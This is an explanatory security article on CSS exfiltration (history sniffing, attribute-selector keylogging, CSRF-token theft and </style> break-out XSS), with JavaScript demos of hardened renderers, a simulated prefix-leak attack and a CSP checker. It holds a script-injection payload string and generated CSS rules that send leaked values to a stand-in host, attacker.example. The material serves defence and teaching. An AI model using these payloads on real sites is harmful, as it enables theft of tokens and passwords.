CSS Exfil Vulnerability

CSS is the stylesheet language that controls how a web page looks, and practically every site on the modern web depends on it. Security researchers have shown that CSS can also be turned against a site: an attacker who manages to get a stylesheet injected into a page can make the victim's browser send data from that page, such as form field values, to a server the attacker controls, without running any script and without the user noticing or consenting.

This class of attack is known as CSS exfiltration (CSS Exfil). Because the leak rides on ordinary resource requests that the browser makes while rendering, it has also been claimed that the same tricks can be used to de-anonymize Tor Browser users.

The main techniques for exploiting a page with injected CSS are:

  • The Visited Link
  • KeyLogger Steal Data
  • Inline Style Block
  • Several others, covered below

The Visited Link method

The :visited pseudo-class matches links whose target URL is already in the user's browsing history. Suppose a page contains a link such as Click Here and the user has previously visited the URL it points to.
A rule like a:visited { color: darkblue; } then applies to that link in place of the user-agent default style.
History sniffing abuses this by replacing the colour change with a resource request, for example a:visited { background-image: url(/grab-data/script.php); }
The browser fetches that image only for links the user has actually visited, so the request itself tells the attacker's server which URLs are in the history, and the user sees nothing unusual. Any developer who reads this rule in a stylesheet should be alarmed.
Modern browsers closed this hole years ago: rules under :visited may now change only colours, those colours are not exposed through getComputedStyle(), and no network request is made on their behalf, so on an up-to-date browser the technique no longer leaks anything.

KeyLogger method

A password input on the page is the obvious target. The idea is to use CSS attribute selectors so that the contents of the input decide which URL the browser requests, and to log that request on the attacker's server. One rule per possible character looks like this:
input[value^="a"] { background: url(logger.php?v=a); }
Whenever the input's value attribute starts with "a", the browser loads logger.php?v=a. Chaining longer prefixes (value^="ab", value^="abc", and so on) recovers the whole string one character at a time.
In practice this is harder than it looks. Typing into a field updates the element's value property, not its value attribute, and attribute selectors only ever match the attribute, so a plain HTML input never triggers these rules. The attack becomes real when a framework mirrors the current value back into the attribute on every keystroke, which React's controlled inputs do, or when the secret is already rendered into the attribute by the server, as with a hidden CSRF token field.
A JavaScript keylogger is far simpler: a few lines that read keystrokes and send them off with an AJAX request, which is why script injection remains the bigger risk on any page that allows it.
Content Security Policy (CSP) can block injected inline scripts and third-party scripts, and the same policy can block injected inline styles (style-src) and the outbound image requests the CSS variant relies on (img-src).
With those controls in place, the pure-CSS keylogger is much less frightening than it first appears.

Using Inline Style Block

Untrusted data placed inside a <style> element is dangerous for a different reason: the HTML parser ends the style element at the first </style> it sees, regardless of the CSS around it. An attacker whose input lands inside the block can therefore write </style><script>...</script> and run arbitrary script, which turns a style injection into full cross-site scripting.
The safest rule is not to interpolate user input into <style> blocks (or style attributes) at all. Where a value must come from the user, validate it against a strict allow-list, such as a hex colour pattern or a known class name, or CSS-escape it so that the characters <, > and / never appear literally.
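The break-out described above, beside two hardened renderers, as an added example that is not code from the original article. The function names, the banner/tooltip classes and the payload string are constructed for the demo; the escaping function implements the standard CSS hex-escape (\HH followed by a space), which the CSS parser decodes but the HTML tokenizer never sees as a tag.

```javascript
// Added example, not code from the original article: the </style> break-out
// beside two hardened renderers. The HTML tokenizer ends a <style> element at
// the first "</style" it sees, whatever the CSS around it says, so the
// defences are (a) allow-list validation for values that must be a colour
// or identifier and (b) CSS hex-escaping for free-form text that goes into
// a CSS string. Names below are constructed for the demo.

// A constructed payload: closes the style element, runs script, then reopens
// a style element so the remaining CSS still parses cleanly.
const BREAKOUT = 'red}</style><script>alert(document.cookie)</script><style>.x{';

// Vulnerable: raw interpolation of a user-chosen colour.
function renderBannerStyleUnsafe(colour) {
  return `<style>.banner{color:${colour}}</style>`;
}

// Hardened for a value that must be a colour: validate against a strict
// pattern and fall back to a default rather than trying to "clean" the input.
function isHexColour(value) {
  return /^#[0-9a-fA-F]{6}$/.test(value);
}
function renderBannerStyleSafe(colour) {
  const safe = isHexColour(colour) ? colour : "#000000";
  return `<style>.banner{color:${safe}}</style>`;
}

// Hardened for free-form text inside a CSS string (e.g. content:"..."):
// every character outside [A-Za-z0-9] becomes \HH followed by a space. The
// CSS parser turns \3c back into "<" when it reads the string, but the HTML
// tokenizer, which runs first, never sees a literal "</style".
function cssEscapeString(text) {
  let out = "";
  for (const ch of String(text)) {
    out += /[A-Za-z0-9]/.test(ch) ? ch : "\\" + ch.codePointAt(0).toString(16) + " ";
  }
  return out;
}
function renderTooltipStyleSafe(text) {
  return `<style>.tip::after{content:"${cssEscapeString(text)}"}</style>`;
}

// Check used in the demo: does a "</style" appear inside the block we meant
// to emit, i.e. before the closing tag we wrote ourselves?
function styleElementBrokenOut(html) {
  const open = "<style>", close = "</style>";
  if (!html.startsWith(open) || !html.endsWith(close)) throw new Error("unexpected wrapper");
  const body = html.slice(open.length, html.length - close.length);
  return /<\/style/i.test(body);
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(renderBannerStyleUnsafe(BREAKOUT), styleElementBrokenOut(renderBannerStyleUnsafe(BREAKOUT)));
  console.log(renderBannerStyleSafe(BREAKOUT), styleElementBrokenOut(renderBannerStyleSafe(BREAKOUT)));
  console.log(renderTooltipStyleSafe("</style><script>alert(1)</script>"));
}
```

Note that escaping is only correct inside a quoted CSS string; a colour or identifier that is hex-escaped (for example \23 ff0000) is no longer the same token, which is why the colour case validates instead of escaping.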

And many more methods….

Injected CSS reaches a page through the same vectors as any other injection:

  • Hijacked browser extensions
  • Accidentally added DOM elements
  • Malicious 3rd-party components
  • Reflected or stored code injection vulnerabilities

Using the attribute-selector technique, researchers have shown that a CSRF token rendered into a hidden form field can be extracted in roughly ten seconds from a single CSS injection. With the stolen CSRF token, the attacker can forge state-changing requests as the victim in very little time.
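The attribute-selector exfiltration behind both the keylogger method and the CSRF-token extraction above, as an added example that is not code from the original article. It simulates the browser with a tiny element model (an attribute map that selectors match against, and a separate live value property) so that it runs offline; the collector URL, the alphabet and the sample token and password are constructed for the demo.

```javascript
// Added example, not code from the original article: a Node-side simulation
// of CSS attribute-selector exfiltration. The "browser" is a tiny model in
// which an element has an attribute map (what CSS selectors match against)
// and a separate live .value property (what the user has typed). The
// endpoint, alphabet and sample values below are constructed for the demo.

const LEAK_ENDPOINT = "https://attacker.example/leak"; // hypothetical collector
const ALPHABET = "abcdefghijklmnopqrstuvwxyz0123456789"; // assumed token alphabet

// One rule per candidate next character, e.g.
//   input[name="csrf"][value^="7ea"]{background-image:url("https://attacker.example/leak?v=7ea")}
function buildPrefixRules(inputName, knownPrefix, alphabet, endpoint) {
  return Array.from(alphabet, (ch) => {
    const guess = knownPrefix + ch;
    const url = `${endpoint}?v=${encodeURIComponent(guess)}`;
    return {
      inputName,
      prefix: guess,
      url,
      css: `input[name="${inputName}"][value^="${guess}"]{background-image:url("${url}")}`,
    };
  });
}

// [value^="prefix"] semantics: the comparison is against the attribute,
// never against the live .value property.
function matchesRule(element, rule) {
  const { name, value } = element.attributes;
  return name === rule.inputName && typeof value === "string" && value.startsWith(rule.prefix);
}

// The "browser": every matching rule with a background-image causes a request.
function requestsTriggered(element, rules) {
  return rules.filter((r) => matchesRule(element, r)).map((r) => r.url);
}

// The attacker's loop: inject rules for the current prefix, watch which URL
// the browser requests, extend the prefix, repeat. In a real attack each
// round is a fresh injection or an @import-chained stylesheet.
function recoverValue(element, inputName, alphabet, endpoint, maxLen) {
  let known = "";
  for (let round = 0; round < maxLen; round++) {
    const rules = buildPrefixRules(inputName, known, alphabet, endpoint);
    const hits = requestsTriggered(element, rules);
    if (hits.length === 0) break; // end of value, or the attribute is not mirrored
    known = new URL(hits[0]).searchParams.get("v");
  }
  return known;
}

// Selectors the attacker must inject to read a value of the given length:
// one per alphabet symbol per round, one round per character plus a final
// round that finds nothing.
function selectorsNeeded(valueLength, alphabet) {
  return alphabet.length * (valueLength + 1);
}

// Case 1: a server-rendered hidden CSRF field. The token sits in the
// attribute, so it leaks character by character.
const hiddenCsrfInput = {
  attributes: { type: "hidden", name: "csrf", value: "7e3b" }, // constructed token
  value: "7e3b",
};

// Case 2: a plain password field. Typing updated .value, but the attribute
// kept its initial empty string, so no prefix rule ever matches.
const plainPasswordInput = {
  attributes: { type: "password", name: "password", value: "" },
  value: "hunter2", // constructed
};

// Case 3: a framework that mirrors the live value into the attribute on
// every keystroke (the behaviour the article attributes to React's
// controlled inputs): the same field becomes readable.
function mirrorValueToAttribute(el) {
  return { ...el, attributes: { ...el.attributes, value: el.value } };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(buildPrefixRules("csrf", "7e", ALPHABET, LEAK_ENDPOINT)[0].css);
  console.log("csrf token:", recoverValue(hiddenCsrfInput, "csrf", ALPHABET, LEAK_ENDPOINT, 32));
  console.log("plain input:", JSON.stringify(recoverValue(plainPasswordInput, "password", ALPHABET, LEAK_ENDPOINT, 32)));
  console.log("mirrored input:", recoverValue(mirrorValueToAttribute(plainPasswordInput), "password", ALPHABET, LEAK_ENDPOINT, 32));
  console.log("selectors for a 32-char token:", selectorsNeeded(32, ALPHABET));
}
```

The cost figure is the point to take away: with a 36-symbol alphabet a 32-character token needs 1188 selectors in total, which is why a single injection of a few kilobytes of CSS is enough and why the published extraction times are measured in seconds.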

Suggestive precautions

Standard web-security hygiene stops most of these attacks. Researchers recommend that developers and site owners deploy a Content Security Policy that restricts where styles may come from (style-src without 'unsafe-inline') and where images and fonts may be fetched from (img-src, font-src), so that neither the injected stylesheet nor its outbound leak request is allowed. Fix the underlying code-injection flaws, and put a suitable web application firewall in front of the application as an additional layer. Users should avoid loading untrusted CSS into their browser, for example through user-style extensions.
Security researchers have also published extensions for the popular browsers that detect and block CSS exfiltration patterns.
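A small checker for the CSP settings recommended above, as an added example that is not code from the original article. It parses a Content-Security-Policy header and answers the two questions that matter for CSS exfiltration: would an injected style block be applied at all, and would the background-image leak request to the attacker's host be allowed. The source-expression matcher is a simplification ('self', '*', scheme-only and exact-origin sources only; host wildcards and paths are not handled), and the origins and policies are constructed for the demo.

```javascript
// Added example, not code from the original article: a checker for the
// Content-Security-Policy settings that matter for CSS exfiltration. The
// source matcher is deliberately simplified ('self', '*', scheme-only and
// exact-origin sources); host wildcards and paths are not handled. Origins
// and policies below are constructed.

function parseCsp(header) {
  const directives = new Map();
  for (const part of header.split(";")) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    // a repeated directive is ignored by browsers: the first one wins
    if (!directives.has(name.toLowerCase())) {
      directives.set(name.toLowerCase(), sources.map((s) => s.toLowerCase()));
    }
  }
  return directives;
}

// The directive that governs a fetch, tried in order; null means no
// directive applies and the browser allows everything.
function governing(directives, ...names) {
  for (const n of names) if (directives.has(n)) return directives.get(n);
  return null;
}

// Would a <style> element injected without a nonce or hash be applied?
function injectedInlineStyleAllowed(header) {
  const sources = governing(parseCsp(header), "style-src-elem", "style-src", "default-src");
  if (sources === null) return true;
  const unsafeInline = sources.includes("'unsafe-inline'");
  // 'unsafe-inline' is ignored when a nonce or hash source is also present
  const nonceOrHash = sources.some((s) => /^'(nonce-|sha(256|384|512)-)/.test(s));
  return unsafeInline && !nonceOrHash;
}

// Would a background-image fetch to attackerOrigin be allowed on a page at
// pageOrigin? (simplified source matching, see the comment at the top)
function imageFetchAllowed(header, pageOrigin, attackerOrigin) {
  const sources = governing(parseCsp(header), "img-src", "default-src");
  if (sources === null) return true;
  const target = new URL(attackerOrigin);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "*") return true;
    if (src === "'self'") return new URL(pageOrigin).origin === target.origin;
    if (/^[a-z][a-z0-9+.-]*:$/.test(src)) return src === target.protocol; // e.g. https:
    try { return new URL(src).origin === target.origin; } catch (e) { return false; }
  });
}

// The exfil chain needs both the injected stylesheet and the leak request.
function cssExfilBlocked(header, pageOrigin, attackerOrigin) {
  return !injectedInlineStyleAllowed(header) || !imageFetchAllowed(header, pageOrigin, attackerOrigin);
}

const PAGE = "https://shop.example";        // constructed
const ATTACKER = "https://attacker.example"; // constructed

// Weak: inline styles allowed, and images may be loaded from any https host.
const WEAK_POLICY = "default-src 'self'; style-src 'self' 'unsafe-inline'; img-src https:";
// Corrected: no inline styles, images only from the site itself.
const STRICT_POLICY = "default-src 'self'; style-src 'self'; img-src 'self'";

if (typeof require !== "undefined" && require.main === module) {
  for (const [label, policy] of [["weak", WEAK_POLICY], ["strict", STRICT_POLICY]]) {
    console.log(label, "inline style allowed:", injectedInlineStyleAllowed(policy),
      "leak request allowed:", imageFetchAllowed(policy, PAGE, ATTACKER),
      "exfil blocked:", cssExfilBlocked(policy, PAGE, ATTACKER));
  }
}
```

Either half of the strict policy is enough on its own: a page that must keep 'unsafe-inline' for legacy styles can still cut the channel by locking down img-src and font-src, because the leak has to leave the browser as a resource fetch.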